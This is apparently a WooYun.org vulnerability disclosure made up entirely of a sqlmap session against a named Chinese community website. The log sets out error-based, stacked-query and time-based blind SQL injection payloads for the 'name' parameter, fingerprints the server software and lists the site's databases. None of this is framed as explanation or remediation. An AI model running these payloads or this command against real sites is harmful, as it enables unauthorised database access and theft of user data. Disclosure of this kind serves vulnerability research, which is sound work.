WooYun.org

root@jack:~# sqlmap -u http://life.cyberway.net.cn/community?name=a --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual                                                                               consent is illegal. It is the end user's responsibility to obey all applicable                                                                               local, state and federal laws. Developers assume no liability and are not respon                                                                              sible for any misuse or damage caused by this program
[*] starting at 14:25:28
[14:25:28] [INFO] resuming back-end DBMS 'mysql'
[14:25:28] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque                                                                              sts:
---
Place: GET
Parameter: name
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: name=a' AND (SELECT 7731 FROM(SELECT COUNT(*),CONCAT(0x7167686371,(                                                                              SELECT (CASE WHEN (7731=7731) THEN 1 ELSE 0 END)),0x716d636671,FLOOR(RAND(0)*2))                                                                              x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JrxR'='JrxR
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: name=a'; SELECT SLEEP(5)--
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: name=a' AND 9806=BENCHMARK(5000000,MD5(0x6171704c)) AND 'SenW'='Sen                                                                              W
---
[14:25:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
[14:25:28] [INFO] fetching database names
[14:25:28] [INFO] the SQL query used returns 6 entries
[14:25:28] [INFO] resumed: information_schema
[14:25:28] [INFO] resumed: colorlife
[14:25:28] [INFO] resumed: colorlife_2015_02_28
[14:25:28] [INFO] resumed: colourlife
[14:25:28] [INFO] resumed: mysql
[14:25:28] [INFO] resumed: test
available databases [6]:
[*] colorlife
[*] colorlife_2015_02_28
[*] colourlife
[*] information_schema
[*] mysql
[*] test
[14:25:28] [INFO] fetched data logged to text files under '/usr/share/sqlmap/out                                                                              put/life.cyberway.net.cn'
[*] shutting down at 14:25:28